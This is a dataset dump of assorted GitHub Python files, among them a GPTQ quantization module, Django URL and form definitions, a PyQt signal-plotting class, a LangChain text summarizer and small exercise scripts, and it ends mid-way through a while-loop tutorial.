\"min-char-rnn\",\n    \"GPT\",\n    \"gpt_source\",\n    'GAN',\n]\n\nout_notebook = nbformat.v4.new_notebook()\nsubject = sys.argv[1].lower()\noutext = \".pdf\"\nif subject == 'cn':\n    files = Complex_Networks\n    outfile = 'Complex_Networks'\nelif subject == 'pr':\n    files = Pattern_Recognition\n    outfile = 'Pattern_Recognition'\nelif subject == 'mnm':\n    files = Models\n    outfile = 'Models_and_Numerical_Methods'\n    outext = \"-LAB.pdf\"\n\nfor file in files:\n    temp_notebook = nbformat.read('./src/{}/{}.ipynb'.format(outfile, file), as_version=4)\n    out_notebook.cells.extend(temp_notebook.cells)\n\nout_pdf = nbconvert.PDFExporter().from_notebook_node(out_notebook)[0]\nwith open(outfile+outext, 'wb') as f:\n    f.write(out_pdf)","repo_name":"Grufoony/Physics_Unibo","sub_path":"make_pdf.py","file_name":"make_pdf.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"8282344495","text":"\"\"\"Display simple information to the user.\n\"\"\"\nimport tkinter as tk\nimport tkinter.ttk as ttk\nfrom customtkinter import *\n\n\nclass ChildDialogInfo:\n    \"\"\"\n    Open a child dialog of a tkinter application to inform the user.\n    \"\"\"\n\n    def __init__(self, parent, title, msg):\n        \"\"\"\n        Open a child dialog of a tkinter application to inform the user.\n\n        Args:\n            parent: the tkinter parent view to use for this window construction.\n            title: title of the popup window\n            msg: Message to show to the user\n        \"\"\"\n        self.app = CTkToplevel(parent)\n        self.app.resizable(False, False)\n        self.app.title(title)\n        self.app.bind(\"<Escape>\", 
self.destroy)\n        appFrame = CTkFrame(self.app)\n        self.rvalue = None\n        self.parent = parent\n        lbl = CTkLabel(appFrame, text=msg)\n        lbl.pack(side=tk.TOP, padx=10, pady=10, fill=tk.X)\n        appFrame.pack(fill=tk.BOTH)\n        try:\n            self.app.wait_visibility()\n            self.app.transient(parent)\n            self.app.focus_force()\n            #self.app.grab_set()\n            self.app.lift()\n        except tk.TclError:\n            pass\n\n    def show(self):\n        \"\"\"Start displaying this window.\"\"\"\n        self.app.update()\n\n    def destroy(self, _event=None):\n        \"\"\"\n        Close the window.\n        \"\"\"\n        # send the data to the parent\n        self.rvalue = None\n        self.app.destroy()\n","repo_name":"fbarre96/PollenisatorGUI","sub_path":"pollenisatorgui/core/application/dialogs/ChildDialogInfo.py","file_name":"ChildDialogInfo.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3626551787","text":"from copy import deepcopy\nimport math\nfrom typing import List, Optional, Set\nimport warnings\n\nimport torch\n\ntry:\n    from torch.linalg import LinAlgError\nexcept:\n    LinAlgError = RuntimeError\nimport unfoldNd\n\nfrom brevitas.graph.gpxq import GPxQ\nfrom brevitas.graph.gpxq import gpxq_mode\nfrom brevitas.graph.gpxq import StopFwdException\nfrom brevitas.graph.gpxq import SUPPORTED_CONV_OP\nimport brevitas.nn as qnn\n\n\nclass gptq_mode(gpxq_mode):\n    \"\"\"\n    Apply GPTQ algorithm https://arxiv.org/abs/2210.17323.\n\n    Args:\n        model (Module): The model to quantize with GPTQ\n        inplace (bool): Whether to apply GPTQ inplace or perform a deepcopy. Default: True\n        use_quant_activations (bool): Whether to leave quantized activations enabled while performing\n            GPTQ. Default: False\n\n    Example:\n        >>> with torch.no_grad():\n        >>>     with gptq_mode(model) as gptq:\n        >>>         gptq_model = gptq.model\n        >>>         for i in tqdm(range(gptq.num_layers)):\n        >>>             for img, t in calib_loader:\n        >>>                 img = img.cuda()\n        >>>                 gptq_model(img)\n        >>>             gptq.update()\n    \"\"\"\n\n    def __init__(\n            self,\n            model,\n            group_of_parallel_layers: Optional[List[str]] = None,\n            inplace: bool = True,\n            create_weight_orig: bool = True,\n            use_quant_activations: bool = True,\n            num_blocks: int = 100,\n            return_forward_output: bool = False,\n            act_order: bool = False) -> None:\n        if not inplace:\n            model = deepcopy(model)\n        super().__init__(\n            model,\n            group_of_parallel_layers,\n            inplace,\n            create_weight_orig,\n            use_quant_activations,\n            act_order,\n            return_forward_output)\n\n        self.orig_forward = self.model.forward\n        self.model.forward = self.catch_stopfwd\n        # How many subblocks to use during GPTQ for each layer\n        self.num_blocks = num_blocks\n\n    def catch_stopfwd(self, *args, **kwargs):\n        try:\n            self.orig_forward(*args, **kwargs)\n        except StopFwdException:\n            pass\n        finally:\n            if self.return_forward_output:\n                # If we want to return the output of the network, we need to disable all hooks\n                for name, gpxq_class in self.gpxq_layers.items():\n                    gpxq_class.disable_pre_forward_hook = True\n                out = self.orig_forward(*args, **kwargs)\n                for name, gpxq_class in self.gpxq_layers.items():\n                    gpxq_class.disable_pre_forward_hook = False\n                return out\n\n    def initialize_module_optimizer(\n            self, layer, name, act_order, len_parallel_layers, create_weight_orig):\n        return GPTQ(\n            layer=layer,\n            name=name,\n            act_order=act_order,\n            len_parallel_layers=len_parallel_layers,\n            create_weight_orig=create_weight_orig,\n            num_blocks=self.num_blocks)\n\n\nclass GPTQ(GPxQ):\n    \"\"\"\n    Adapted from https://github.com/IST-DASLab/gptq, released under the following LICENSE:\n\n    Copyright 
2023 IST-DASLab\n\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n \"\"\"\n\n def __init__(\n self,\n layer,\n name,\n act_order,\n len_parallel_layers=1,\n create_weight_orig=True,\n num_blocks=100) -> None:\n super().__init__(layer, name, act_order, len_parallel_layers, create_weight_orig)\n\n dev = self.layer.weight.device\n\n # Define how many columns to update in each mini-block\n self.blocksize = math.ceil(self.columns / num_blocks)\n\n # Initialize Hessian matrix and counter. We need it in float32 to compute the inverse\n self.H = torch.zeros((self.groups, self.columns, self.columns),\n device=dev,\n dtype=torch.float32)\n self.nsamples = 0\n\n def update_batch(self, module, input, current_layer):\n if self.disable_pre_forward_hook:\n return input\n\n # Update reference to current layer\n current_layer.layer_names.add(self.name)\n inp = self.process_input(input)\n batch_size = inp.shape[0]\n\n # Preprocess the input to compute the Hessian\n if isinstance(self.layer, qnn.QuantLinear):\n if len(inp.shape) > 2:\n inp = inp.reshape((-1, sum(inp.shape[2:])))\n inp = inp.t()\n # For QuantLinear layer, groups will be 1\n inp_processed = inp.unsqueeze(0)\n\n if isinstance(self.layer, SUPPORTED_CONV_OP):\n # Pick the correct unfoldNd class\n if isinstance(self.layer, (qnn.QuantConvTranspose1d, qnn.QuantConvTranspose2d)):\n unfold_impl = unfoldNd.UnfoldTransposeNd\n else:\n unfold_impl = unfoldNd.UnfoldNd\n\n unfold = unfold_impl(\n self.layer.kernel_size,\n dilation=self.layer.dilation,\n padding=self.layer.padding,\n stride=self.layer.stride)\n\n # Split input based on how many groups in convolution\n inp_by_group = torch.chunk(inp, self.groups, 1)\n inp_processed = []\n # Preprocess input by group\n for i, inp in enumerate(inp_by_group):\n inp = unfold(inp)\n inp = inp.transpose(1, 0)\n inp = inp.flatten(1)\n inp_processed.append(inp)\n inp_processed = torch.stack(inp_processed)\n\n # Hessian computation\n self.H *= self.nsamples / (self.nsamples + batch_size)\n self.nsamples += batch_size\n inp_processed = math.sqrt(2 / self.nsamples) * inp_processed.to(torch.float32)\n self.H += inp_processed.bmm(inp_processed.transpose(2, 1))\n # If we are executing GPTQ with group of parallel layers, we keep track of how many forward\n # we executed. 
Once we executed as many as the number of parallel_layers, we raise\n # StopFwdException\n current_layer.forward_count += 1\n if current_layer.forward_count == self.len_parallel_layers:\n current_layer.forward_count = 0\n raise StopFwdException\n\n def single_layer_update(self, percdamp=.01):\n weight = self.layer.weight.data\n dev = weight.device\n\n # Store the original dtype of the weights\n # During computation, everything is converted to float32.\n # When the weights are updated, we cast everything back to the original dtype\n dtype = weight.dtype\n\n if isinstance(self.layer, SUPPORTED_CONV_OP):\n if isinstance(self.layer, (qnn.QuantConvTranspose1d, qnn.QuantConvTranspose2d)):\n weight = weight.transpose(1, 0) # This performs a view\n weight = weight.flatten(1)\n\n # List with permutation tensors for the Hessian and Weight matrix.\n # If act_order is False, the tensors will be ordered indexes.\n # For groupwise convolution, we have one tensor per group,\n # thus len(permutation_list) is always equal to self.groups.\n # We do not explicity permute the weight matrix, only the Hessian.\n permutation_list = []\n weight = weight.view(self.groups, -1, weight.shape[-1])\n # For groupwise convolution, these operations are groupwise so we iterate\n for i in range(self.groups):\n # If a diagonal element on the Hessian is zero, we can set to 0 the corresponding\n # column in the weight matrix.\n # The diagonal element is set to 1 to avoid division-by-zero\n dead = torch.diag(self.H[i, :, :]) == 0\n self.H[i, dead, dead] = 1\n # If the diagonal of activations is zero, we set the weight to zero\n weight[i, :, dead] = 0\n if self.act_order:\n # Re-order Hessian so that weights associated to\n # higher magnitude activations are quantized first\n perm = torch.argsort(torch.diag(self.H[i, :, :]), descending=True)\n self.H[i, :, :] = self.H[i, perm, :][:, perm]\n else:\n # No permutation, permutation tensor is a ordered index\n perm = torch.tensor(range(self.H.shape[-1]), device=dev)\n permutation_list.append(perm)\n\n # Try/Except in case the inverse Hessian cannot be computed\n try:\n for i in range(self.groups):\n damp = percdamp * torch.mean(torch.diag(self.H[i, :, :]))\n diag = torch.arange(self.columns, device=dev)\n self.H[i, diag, diag] += damp\n self.H[i, :, :] = torch.linalg.cholesky(self.H[i, :, :])\n self.H[i, :, :] = torch.cholesky_inverse(self.H[i, :, :])\n self.H[i, :, :] = torch.linalg.cholesky(self.H[i, :, :], upper=True)\n h_inv = self.H\n except LinAlgError as e:\n warnings.warn(\n f'Failed to compute the inverse of the Hessian for layer {self.name} '\n f'GPTQ will not be applied. 
'\n f'Increasing the number of samples might fix this issue')\n return\n finally:\n del self.H\n\n for i1 in range(0, self.columns, self.blocksize):\n i2 = min(i1 + self.blocksize, self.columns)\n count = i2 - i1\n error_block = torch.zeros_like(\n weight[:, :, perm[i1:i2]], dtype=torch.float32) # [groups, OC/groups, i2-i1]\n\n h_inv_block = h_inv[:, i1:i2, i1:i2]\n for i in range(count):\n q_groups = self.get_quant_weights(i, i1, permutation_list) # [groups, OC/groups]\n for group_index in range(self.groups):\n perm = permutation_list[group_index]\n q = q_groups[group_index] # [OC/groups]\n w = weight[group_index, :, perm[i1:i2][i]].to(torch.float32) # [OC/groups]\n d = h_inv_block[group_index, i, i] # [1]\n error = (w - q) / d # [OC/groups]\n error_block[group_index, :, i] = error\n # We need to update the original weights\n weight[group_index, :, perm[i1:i2][i:]] -= (\n error.unsqueeze(1).matmul(h_inv_block[group_index, i,\n i:].unsqueeze(0))).to(dtype)\n\n for group_index in range(self.groups):\n perm = permutation_list[group_index]\n weight[group_index, :, perm[i2:]] -= (\n error_block[group_index].matmul(h_inv[group_index, i1:i2, i2:])).to(dtype)\n","repo_name":"fabianandresgrob/brevitas","sub_path":"src/brevitas/graph/gptq.py","file_name":"gptq.py","file_ext":"py","file_size_in_byte":11287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"12104638170","text":"# 문제\n# 2×n 크기의 직사각형을 1×2, 2×1 타일로 채우는 방법의 수를 구하는 프로그램을 작성하시오.\n#\n# 아래 그림은 2×5 크기의 직사각형을 채운 한 가지 방법의 예이다.\n#\n#\n#\n# 입력\n# 첫째 줄에 n이 주어진다. (1 ≤ n ≤ 1,000)\n#\n# 출력\n# 첫째 줄에 2×n 크기의 직사각형을 채우는 방법의 수를 10,007로 나눈 나머지를 출력한다.\n#\n# 예제 입력 1\n# 2\n# 예제 출력 1\n# 2\n\n# 예제 입력 2\n# 9\n# 예제 출력 2\n# 55\n\nn = int(input())\ncount = 0\na = 1\nb = 2\nif n ==1:\n print(a)\nelif n ==2:\n print(b)\nelse:\n for i in range(n-2):\n # print('증가전',a,b)\n # c에 i번째 타일링 가능 개수가 들어감\n c = a + b\n # count += c\n a = b\n b = c\n # print('증가후',a,b,c)\n print(c%10007)","repo_name":"jinhuioh/home_pythorn","sub_path":"pythonProject_codingTest/codingTest/백준문제/그리디/2곱하기n타일링.py","file_name":"2곱하기n타일링.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19808270929","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy.interpolate import UnivariateSpline\n\nx = np.linspace(-10, 10, 50)\ny = np.exp(-x ** 2) + 0.1 * np.random.randn(50)\nplt.plot(x, y, 'ro', ms=5)\nplt.show()\nspl = UnivariateSpline(x, y)\nxs = np.linspace(-10, 10, 50)\nplt.plot(xs, spl(xs), 'g', lw=3)\nplt.show()\n","repo_name":"Artem3223/Scipy-Interpalation","sub_path":"Scipy2.py","file_name":"Scipy2.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17123868883","text":"\"\"\"Project_PUR URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.11/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. 
Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\n#Main Project Url\n\nfrom django.conf.urls import url\nfrom django.contrib import admin\nfrom account import views as accountview\n\n\nurlpatterns = [\n\turl(r'^$',accountview.false),\n\turl(r'^login/$',accountview.loginit,name='login'),\n\turl(r'^logout/$',accountview.logoutit,name='logout'),\n\turl(r'^purchecker/$',accountview.checkpur,name='checkpur'),\n\turl(r'^purgen/$',accountview.UploadPURForm,name='uploadpur'),\n\turl(r'^test/$',accountview.test,name='test'),\n\turl(r'^generate_cert/(?P[0-9A-Za-z]+)/(?P[0-9A-Za-z ]+)$',accountview.cert,name='printcert'),\n\turl(r'^android/(?P[0-9A-Za-z]+)/(?P[0-9A-Za-z]+)$',accountview.androidapi),\n\turl(r'^signup/$',accountview.createaccount,name='createaccount'),\n\turl(r'^profile/$',accountview.dashboard,name='profile'),\n\turl(r'^hospital/$',accountview.hospital,name='hospital'),\n]\n","repo_name":"sanudatta11/Project_PUR","sub_path":"Project_PUR/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30225032310","text":"from PyQt5 import QtCore\nimport pyqtgraph as pg\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy.io.wavfile import write\nimport winsound\nimport math\n\nmidColor = [(0, 182, 188, 255), (128, 128, 128, 255), (0, 128, 128, 255), (230,0,115, 255), (204, 0, 0, 255)]\nmaxColor = [(246, 111, 0, 255), (0, 0, 0, 255), (230, 230, 0, 255), (0,0,0, 255), (0, 0, 0, 255)]\nminColor = [(75, 0, 113, 255), (255, 255, 255, 255), (102, 0, 34, 255), (255,255,255, 255), (255,255,255, 255)]\n\nclass signal(object):\n timer = QtCore.QTimer()\n speedFactor = 3000\n\n def __init__(self, data, fs, widget, winNumber):\n self.amplitude = np.int32((data))\n self.fs = fs\n self.fmax = fs/2\n self.maxAmplitude = self.amplitude.max()\n self.minAmplitude = self.amplitude.min()\n self.zoomFactor = 1\n self.__class__.speedFactor = fs/10\n self.time = np.linspace(0., len(data)/fs, len(data))\n self.startTimeIdx = 0\n self.endTimeIdx = int(fs * self.zoomFactor) - 1\n self.__class__.timer.setInterval(200) # m interval\n self.widget = widget\n self.winNumber = winNumber\n self.plot()\n self.listen()\n\n def updateSignal(self, data):\n self.amplitude = np.int32((data))\n self.time = np.linspace(0., len(data)/self.fs, len(data))\n self.plot()\n self.save()\n self.listen()\n\n def plot(self):\n self.maxAmplitude = self.amplitude.max()\n self.minAmplitude = self.amplitude.min()\n self.widget.setXRange(self.time[self.startTimeIdx], self.time[self.endTimeIdx])\n self.widget.setYRange(self.minAmplitude * self.zoomFactor , self.maxAmplitude * self.zoomFactor)\n self.pen = pg.mkPen(color=(255, 0, 0))\n self.widget.clear()\n self.widget.plot(self.time, self.amplitude, pen=self.pen)\n\n def moveGraph(self):\n if len(self.time) - int(self.fs * self.zoomFactor):\n self.startTimeIdx = int(self.startTimeIdx + self.__class__.speedFactor) % (len(self.time) - int(self.fs * self.zoomFactor))\n self.endTimeIdx = int(self.endTimeIdx + self.__class__.speedFactor % len(self.time)) - 1\n self.widget.setXRange(self.time[self.startTimeIdx], self.time[self.endTimeIdx])\n\n def scrollSignal(self, value): # value: 0 -> 100\n if len(self.time) - int(self.fs * self.zoomFactor):\n self.startTimeIdx = int(value/100* (len(self.amplitude) - int(self.fs * self.zoomFactor - 1)))\n self.endTimeIdx = int(self.startTimeIdx + int(self.fs * self.zoomFactor - 1))\n 
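# keep the plotted x-range in step with the scrollbar position\n            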
self.widget.setXRange(self.time[self.startTimeIdx], self.time[self.endTimeIdx])\n\n def zoomIn(self):\n if self.zoomFactor >= 0.2:\n self.zoomFactor = self.zoomFactor - 0.1\n self.adjustGraph()\n\n def zoomOut(self):\n if self.zoomFactor < 2.0:\n self.zoomFactor = self.zoomFactor + 0.1\n self.adjustGraph()\n\n def adjustGraph(self):\n self.endTimeIdx = int(self.startTimeIdx + int(self.fs * self.zoomFactor - 1))\n self.widget.setXRange(self.time[self.startTimeIdx], self.time[self.endTimeIdx])\n self.widget.setYRange(self.minAmplitude * self.zoomFactor , self.maxAmplitude * self.zoomFactor)\n\n def getFigure(self):\n fig = plt.figure(figsize=(10, 5))\n plt.plot(self.time[self.startTimeIdx:self.endTimeIdx],self.amplitude[self.startTimeIdx:self.endTimeIdx])\n plt.xlabel('time (sec)')\n plt.ylabel('amplitude (mv)')\n return fig\n\n def getSpectrogram(self, cmap):\n fig = plt.figure(figsize=(10, 5))\n plt.specgram(self.amplitude, Fs=self.fs, cmap = cmap)\n plt.xlabel('time (sec)')\n plt.ylabel('frequency (Hz)')\n plt.colorbar()\n return fig\n\n def initSpectrogram(self, imageItem, hist):\n # Scale the X and Y Axis to time and frequency (standard is pixels)\n imageItem.scale(self.time[-1]/np.size(self.powerSpectrum, axis=1), math.pi/np.size(self.powerSpectrum, axis=0))\n self.setSpectrogramColor(hist, 0)\n\n def setSpectrogramColor(self, hist, slidervalue): # slidervalue -> 0: 4\n hist.gradient.restoreState({'mode': 'rgb','ticks': [(0.5, midColor[slidervalue]),(1.0, maxColor[slidervalue]),(0.0, minColor[slidervalue])]})\n hist.gradient.saveState()\n\n def plotSpectrogram(self, imageItem):\n self.powerSpectrum, self.freqenciesFound, _, _ = plt.specgram(self.amplitude, Fs=self.fs)\n # for more colormaps: https://matplotlib.org/2.0.2/examples/color/colormaps_reference.html\n # Sxx contains the amplitude for each pixel\n imageItem.setImage(self.powerSpectrum)\n\n def moveSpectrogram(self, minIntensity, maxIntensity, plotItem, hist):\n # Fit the min and max levels of the histogram to the data available\n min = np.min(self.powerSpectrum)\n max = np.max(self.powerSpectrum)\n hist.setLevels(min + (max - min) * minIntensity, max * maxIntensity)\n # plotItem.setXRange(self.time[self.startTimeIdx], self.time[self.endTimeIdx])\n\n def listen(self):\n winsound.PlaySound(\"output_sound\" + str(self.winNumber) + \".wav\", winsound.SND_ASYNC)\n def save(self):\n write(\"output_sound\" + str(self.winNumber) + \".wav\", self.fs, self.amplitude.astype(np.int16))\n","repo_name":"badra022/Music-Equalizer","sub_path":"classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":5299,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"23203868688","text":"from board.Board import Board\r\nfrom board.StartingCoord import StartingCoord\r\nimport argparse\r\n\r\n\r\ndef convert_input_to_starting_coord(input):\r\n split = input.split(',')\r\n nums = [int(num.strip()) for num in split]\r\n assert len(nums) == 3\r\n\r\n return StartingCoord(nums[0], nums[1], nums[2])\r\n\r\n\r\nparser = argparse.ArgumentParser()\r\nparser.add_argument('--initial_vals', required=True, nargs='+', type=convert_input_to_starting_coord)\r\n\r\n\r\nif __name__ == '__main__':\r\n args = parser.parse_args()\r\n board = Board()\r\n\r\n board.solve(args.initial_vals)\r\n\r\n 
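# print every subgroup of the completed board\r\n    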
board.print_all_subgroups()\r\n","repo_name":"sheric98/sudoku_subgrouping","sub_path":"SudokuSolver.py","file_name":"SudokuSolver.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72240227688","text":"import os\nimport pandas as pd\nfrom sklearn.preprocessing import MinMaxScaler\nfrom random import randint\n\n\ndef get_data(path):\n    minf = 1500\n    maxf = 2300\n    data = pd.DataFrame()\n    scaler = MinMaxScaler(feature_range=(0, 1))\n    # n_train = 10000\n    # batch_size = 12288\n    batch_size = 1024*3\n    n_batch = 30 * batch_size #this should be like n times timesteps * batch_size\n\n    rand_start = randint(1, 70000)\n\n    for root, dirs, files in os.walk(path):\n        \"\"\"\n        not sure if dirs sorting is needed\n        dirs.sort()\n        \"\"\"\n\n        #sort file names\n        files.sort(key=lambda x: x.lower())\n        for file in files:\n            name = os.path.join(root, file)\n            if 'input' in name:\n                input = pd.read_table(name, header=None)\n\n                input = input[rand_start:rand_start + 3 * n_batch] #take 3 parts randomly\n\n                values = input.values\n                values = values.astype('float32')\n\n                # normalize\n\n                scaled_x = scaler.fit_transform(values)\n                input = pd.DataFrame(scaled_x, columns=['input1', 'input2'])\n                # normalize f\n                input['f'] = (int(root.strip().split('_')[1]) - minf) / (maxf - minf)\n\n            elif 'output' in name:\n                output = pd.read_table(name, header=None)\n\n                output = output[rand_start:rand_start + 3 * n_batch]\n\n                values = output.values\n                values = values.astype('float32')\n\n                # no normalize\n                # scaled_y = scaler.fit_transform(values)\n                output = pd.DataFrame(values, columns=['output1', 'output2'])\n\n                df = pd.concat([input, output], axis=1)\n                data = pd.concat([data, df], sort=False)\n            else:\n                pass\n\n    return data, batch_size, n_batch\n\n\n\n","repo_name":"godeity/frequency-project","sub_path":"get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":1864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41029081061","text":"from langchain import LLMChain\nfrom langchain.prompts import PromptTemplate\nfrom langchain.chat_models import ChatOpenAI\nimport textwrap\nimport os, time\n\n\ndef summarise(text): \n    llm = ChatOpenAI(openai_api_key=\"sk-xxxxxxxxxxx\",temperature=0,model_name=\"gpt-3.5-turbo\")\n    prompt = PromptTemplate(\n        input_variables=[\"text\"],\n        template=\"Concisely summarise the following text and start your summary with \"\"---\"\": {text}\",\n    )\n    chain = LLMChain(llm=llm, prompt=prompt)\n    summary = chain.run(text)\n    return summary \n\n# open the file at the given filepath and return its content\ndef open_file(filepath):\n    with open(filepath, 'r', encoding='utf-8') as infile:\n        return infile.read()\n\n\nif __name__ == '__main__':\n\n    #set parameters\n    input_directory = 'Texts'\n    output_directory = 'Summaries'\n\n    # loop through all files in folder\n    for filename in os.listdir(input_directory):\n        filepath = os.path.join(input_directory, filename)\n        text = open_file(filepath)\n\n        # break them down into chunks, 1400 characters each\n        chunks = textwrap.wrap(text, 1400,break_long_words=False)\n        count = 0\n        index = 0\n\n        print (\"Summarising: \"+ filename +\"...\\n\")\n        \n        # loop over the chunks\n        for chunk in chunks:\n\n            # try to generate a summary through all available bot instances\n            count = count + 1\n            success = False\n            error_not_yet_shown = True\n            retry_count = 0\n            while not success:\n                try:\n                    summary = 
summary.replace(\"---\", \"\\n- \")\n success = True\n retry_count = 0 \n except Exception as not_summarised:\n print(not_summarised)\n if error_not_yet_shown: \n print (\"Hold tight, retrying until it works...\\n\")\n error_not_yet_shown = False \n success = False\n with open ('error_log.txt', 'w', encoding = 'utf-8') as f:\n f.write (\"Summarisation failed for: \"+filename+\" for the following chunk of text:\\n\\n\\\"\"+chunk+\"\\\"\\n\\n\")\n f.close()\n retry_count += 1\n if retry_count >= 5:\n time.sleep(30)\n retry_count = 0\n\n print('\\n\\n\\n', count, 'of', len(chunks), ' - ', summary)\n\n # append to and save the summary file in the Summaries/ folder\n with open(os.path.join(output_directory, filename), 'a', encoding='utf-8') as f:\n f.write(summary + '\\n\\n')\n f.close()\n","repo_name":"JunMagic88/TLDR-Local","sub_path":"TLDR-Local.py","file_name":"TLDR-Local.py","file_ext":"py","file_size_in_byte":2735,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"72416493609","text":"__author__ = 'teddyxiong53'\n__contact__ = '1073167306@qq.com'\n__projecturl__ = 'https://github.com/teddyxiong53/wxnote'\n\n__appname__ = 'WXNote'\n__license__ = 'MIT'\n\n__description__ = 'A notepad based on wxpython'\n\n__descriptionfull__ = '''Try to replace notepad++'''\n\n__licensefull__ = '''\nMIT license\n'''\n","repo_name":"teddyxiong53/wxnote","sub_path":"wxnote/info.py","file_name":"info.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23301671778","text":"from django import forms\nfrom .models import Employee\n\n\nclass EmployeeForm(forms.ModelForm):\n class Meta:\n model = Employee\n fields = ['id', 'fullname', 'empcode', 'mobile', 'position']\n labels = {\n 'fullname': 'Full Name',\n 'empcode': 'Emp Code',\n\n }\n\n def __init__(self, *args, **kwargs):\n super(EmployeeForm, self).__init__(*args, **kwargs)\n\n # self.fields['position'].empty_label =\"Select\"\n\n def save(self, commit=True):\n instance = super(EmployeeForm, self).save(commit=False)\n if commit:\n instance.save()\n return instance\n\n\nclass employeeSearchForm(forms.ModelForm):\n class Meta:\n model = Employee\n fields = ['empcode']\n","repo_name":"Tejustj1995/employeelist","sub_path":"employeedetails/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21771255351","text":"from numpy import random\nimport datetime\nimport time\nfrom psychopy import visual, core, event\nfrom StimulationProcess.StimulationController import StimulationController\nimport os\nfrom tqdm import tqdm\nimport numpy as np\nimport pickle\n\nclass viewContainer():\n # container 应该包含所有刺激所需的要素\n def __init__(self,config) -> None:\n\n # w 代表window,所有的刺激都要在win上显示\n self.w = None\n # initFrame代表初始帧,非刺激状态下都是这一帧\n self.initFrame = None\n # frameSet是ImageStim的集合,是刺激帧\n self.frameSet = None\n # cue应该是一串数组\n self.cue = None\n # targetPos是每个目标在屏幕上的位置,显示cue的时候用得到\n self.targetPos = None\n # stringPos是在线实验时候,字符的位置,暂时用不到\n self.stringPos = None\n\n \n self.takeConfig(config)\n pass\n\n def takeConfig(self,config):\n\n self.cue = config.cue\n self.char = config.char\n self.targetNUM = config.targetNUM\n self.blockNUM = config.blockNUM\n self.displayChar = config.displayChar\n self.resolution = config.resolution\n if config.masked is not None:\n self.masks = config.masked\n\n 
pass\n\n\nclass Stimulator():\n\n    def __init__(self,config) -> None:\n\n        self.addSTI = config.addSTI\n\n        # viewContainer bundles everything needed to present the stimuli\n        self.viewContainer = viewContainer(config)\n        # controller drives the stimulation sequence\n\n        self.controller = StimulationController()\n        \n        pass \n\n\n    def loadPics(self):\n\n        xScreen,yScreen = self.viewContainer.resolution\n\n        win = visual.Window([xScreen, yScreen], monitor=\"testMonitor\", units=\"pix\", fullscr=True,waitBlanking=True, color=(0, 0, 0), colorSpace='rgb255', screen=0,allowGUI=True)\n        # win.close()\n        picAdd = os.listdir(self.addSTI)\n        frameSet = []\n        # initial frame\n        add = self.addSTI + os.sep + 'initial_frame.png'\n        initFrame = visual.ImageStim(win, image=add, pos=[0, 0], size=[xScreen, yScreen], units='pix', flipVert=False)\n\n        # stimulation frames\n\n        for picINX in tqdm(range(len(picAdd)-2)):\n            add = self.addSTI + os.sep + '%i.png' % picINX\n            frame = visual.ImageStim(win, image=add, pos=[0, 0], size=[xScreen, yScreen], units='pix', flipVert=False)\n            frameSet.append(frame)\n\n        self.viewContainer.w = win\n        self.viewContainer.frameSet = frameSet\n        self.viewContainer.initFrame = initFrame \n\n        with open(self.addSTI+os.sep+'STI.pickle', \"rb\") as fp:\n            pos = pickle.load(fp)\n        \n        self.viewContainer.targetPos = pos.rectSet\n        self.viewContainer.stringPos = pos.stringPositions\n\n        return self\n\n    def run(self):\n\n        self.controller.initial(self.viewContainer)\n\n        while True:\n            self.controller.run()\n            self.controller.change()\n\n    \n\n\nif __name__ == '__main__':\n    \n    addSTI = 'picFolder/ssvep'\n    stimulator = Stimulator(addSTI)\n    stimulator.loadPics()\n    stimulator.run()\n","repo_name":"ShinlDiego/40-PschoPy","sub_path":"stimulator.py","file_name":"stimulator.py","file_ext":"py","file_size_in_byte":3178,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"41571538457","text":"# In this code, we have defined a variable named condition,\n# and condition starts at a value of 1.\ncondition = 1\n\nwhile condition < 10:\n\tprint(condition)\n\tcondition += 1\n# This setup of a while loop is known as creating a \"counter,\" since basically that\n# is what we're doing. We're saying we just want to count 1 for every iteration and\n# eventually stop at our limit. While loops are usually finite and defined in this\n# sense, but while loops can also be undefined. Something like:\n#\n# 